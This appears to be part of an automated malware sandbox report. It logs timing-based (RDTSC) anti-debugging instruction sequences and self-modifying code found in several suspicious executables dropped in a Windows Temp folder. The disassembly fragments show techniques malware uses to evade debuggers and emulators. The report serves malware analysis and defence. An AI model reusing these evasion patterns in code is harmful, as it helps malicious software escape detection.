Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0187 second address: 52D01DC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F114478E748h 0x00000008 adc ecx, 041256F8h 0x0000000e jmp 00007F114478E73Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 jmp 00007F114478E744h 0x0000001e mov eax, 4BD882B1h 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov cx, 660Fh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D01DC second address: 52D01E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52C0E1C second address: 52C0EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push esi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F114478E749h 0x00000013 pop esi 0x00000014 jmp 00007F114478E741h 0x00000019 popad 0x0000001a mov ah, 88h 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F114478E749h 0x00000025 sbb cl, 00000006h 0x00000028 jmp 00007F114478E741h 0x0000002d popfd 0x0000002e mov cx, AFB7h 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 jmp 00007F114478E73Ah 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52C0EA1 second address: 52C0EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52C0EA8 second address: 52C0EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53502D8 second address: 535038E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1144C8B194h 0x00000009 add ch, FFFFFF98h 0x0000000c jmp 00007F1144C8B18Bh 0x00000011 popfd 0x00000012 jmp 00007F1144C8B198h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d pushad 0x0000001e mov dh, ah 0x00000020 pushfd 0x00000021 jmp 00007F1144C8B193h 0x00000026 and cx, 64BEh 0x0000002b jmp 00007F1144C8B199h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 mov esi, 5F9F7FA3h 0x0000003a pushfd 0x0000003b jmp 00007F1144C8B198h 0x00000040 sbb esi, 7504FCE8h 0x00000046 jmp 00007F1144C8B18Bh 0x0000004b popfd 0x0000004c popad 0x0000004d pop ebp 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5340395 second address: 53403F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F114478E741h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F114478E743h 0x00000019 jmp 00007F114478E743h 0x0000001e popfd 0x0000001f mov ax, B40Fh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53403F5 second address: 5340432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1144C8B18Bh 0x00000009 jmp 00007F1144C8B193h 0x0000000e popfd 0x0000000f mov dh, al 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ebp, esp 0x00000016 jmp 00007F1144C8B18Bh 0x0000001b pop ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ax, 2671h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5340124 second address: 534014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F114478E747h 0x00000009 pop ecx 0x0000000a popad 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ax, 2E67h 0x00000014 mov edx, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 534014D second address: 5340188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1144C8B198h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5340188 second address: 534018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 534018E second address: 53401BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1144C8B197h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D079A second address: 52D07FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 39A4h 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jmp 00007F114478E744h 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F114478E73Eh 0x0000001d or ecx, 7B4ABF88h 0x00000023 jmp 00007F114478E73Bh 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b call 00007F114478E746h 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D07FA second address: 52D080C instructions: 0x00000000 rdtsc 0x00000002 mov edx, 78F00EA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D080C second address: 52D0810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0810 second address: 52D0814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0814 second address: 52D081A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53406A5 second address: 53406A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53406A9 second address: 53406AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53406AF second address: 534070B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1144C8B18Ch 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F1144C8B18Ch 0x00000013 push dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edi, 082D2FC0h 0x0000001e pushfd 0x0000001f jmp 00007F1144C8B199h 0x00000024 adc ah, FFFFFFC6h 0x00000027 jmp 00007F1144C8B191h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 534070B second address: 534077F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c jmp 00007F114478E73Eh 0x00000011 push 11C4F179h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F114478E73Ah 0x0000001f sbb al, FFFFFFC8h 0x00000022 jmp 00007F114478E73Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F114478E748h 0x0000002e or eax, 38437D28h 0x00000034 jmp 00007F114478E73Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1B604 second address: B1B611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1144C8B18Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1B611 second address: B1B632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F114478E747h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1B632 second address: B1B64F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1B64F second address: B1B655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5340807 second address: 534080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 534080B second address: 5340811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5340811 second address: 5340827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 531048B second address: 53104CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F114478E740h 0x0000000f push eax 0x00000010 jmp 00007F114478E73Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F114478E745h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53104CE second address: 5310526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F1144C8B18Eh 0x00000010 and esp, FFFFFFF0h 0x00000013 pushad 0x00000014 jmp 00007F1144C8B18Ah 0x00000019 popad 0x0000001a sub esp, 44h 0x0000001d jmp 00007F1144C8B190h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 call 00007F1144C8B18Ch 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310526 second address: 5310575 instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, 9292h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F114478E748h 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F114478E73Dh 0x0000001c adc ch, 00000016h 0x0000001f jmp 00007F114478E741h 0x00000024 popfd 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310575 second address: 5310642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e mov edx, 4BE1FA14h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 movzx ecx, bx 0x00000019 mov edi, 40CD6298h 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1144C8B18Dh 0x00000027 adc cx, C186h 0x0000002c jmp 00007F1144C8B191h 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F1144C8B190h 0x00000038 add eax, 323AA428h 0x0000003e jmp 00007F1144C8B18Bh 0x00000043 popfd 0x00000044 popad 0x00000045 xchg eax, edi 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F1144C8B194h 0x0000004d sub cx, 5688h 0x00000052 jmp 00007F1144C8B18Bh 0x00000057 popfd 0x00000058 mov ebx, esi 0x0000005a popad 0x0000005b push eax 0x0000005c jmp 00007F1144C8B195h 0x00000061 xchg eax, edi 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F1144C8B18Dh 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310642 second address: 53106A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F114478E73Ch 0x00000013 or ch, 00000078h 0x00000016 jmp 00007F114478E73Bh 0x0000001b popfd 0x0000001c mov dx, ax 0x0000001f popad 0x00000020 mov dword ptr [esp+24h], 00000000h 0x00000028 jmp 00007F114478E742h 0x0000002d lock bts dword ptr [edi], 00000000h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53106A0 second address: 53106A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53106A4 second address: 53106C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53106C1 second address: 531078F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F11B684CEE3h 0x0000000f pushad 0x00000010 movzx esi, di 0x00000013 call 00007F1144C8B199h 0x00000018 pushfd 0x00000019 jmp 00007F1144C8B190h 0x0000001e sbb ecx, 3DBC1FF8h 0x00000024 jmp 00007F1144C8B18Bh 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c pop edi 0x0000002d pushad 0x0000002e mov bl, 77h 0x00000030 mov ax, 3B7Dh 0x00000034 popad 0x00000035 pop esi 0x00000036 jmp 00007F1144C8B198h 0x0000003b pop ebx 0x0000003c jmp 00007F1144C8B190h 0x00000041 mov esp, ebp 0x00000043 pushad 0x00000044 mov ecx, 162BF6CDh 0x00000049 pushfd 0x0000004a jmp 00007F1144C8B18Ah 0x0000004f or esi, 03888BE8h 0x00000055 jmp 00007F1144C8B18Bh 0x0000005a popfd 0x0000005b popad 0x0000005c pop ebp 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F1144C8B195h 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 531078F second address: 5310795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310795 second address: 5310799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310021 second address: 5310027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310027 second address: 531002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 531002B second address: 5310098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F114478E748h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F114478E73Dh 0x00000018 adc cx, 8966h 0x0000001d jmp 00007F114478E741h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F114478E740h 0x00000029 sbb si, 6108h 0x0000002e jmp 00007F114478E73Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310098 second address: 53100C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1144C8B18Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53100C6 second address: 53100CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53100CC second address: 53100D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53100D0 second address: 53100D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53100D4 second address: 53100E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53100E2 second address: 53100EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 8412h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53100EB second address: 5310139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B198h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007F1144C8B190h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx ebx, ax 0x00000018 call 00007F1144C8B196h 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310139 second address: 531013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 531013F second address: 5310143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310143 second address: 5310162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F114478E744h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310162 second address: 5310169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310169 second address: 531018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F114478E744h 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 531018B second address: 5310191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310191 second address: 5310195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310195 second address: 5310199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5310199 second address: 53101B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F114478E740h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53101B6 second address: 531021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1144C8B191h 0x00000009 and cx, BDC6h 0x0000000e jmp 00007F1144C8B191h 0x00000013 popfd 0x00000014 mov ch, AAh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ecx, 00000000h 0x0000001e jmp 00007F1144C8B198h 0x00000023 xchg eax, edi 0x00000024 jmp 00007F1144C8B190h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Special instruction interceptor: First address: 972A72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Special instruction interceptor: First address: B0B900 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Special instruction interceptor: First address: B96DB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 6F2A72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 88B900 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 916DB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Special instruction interceptor: First address: 572A72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Special instruction interceptor: First address: 70B900 instructions caused by: Self-modifying code
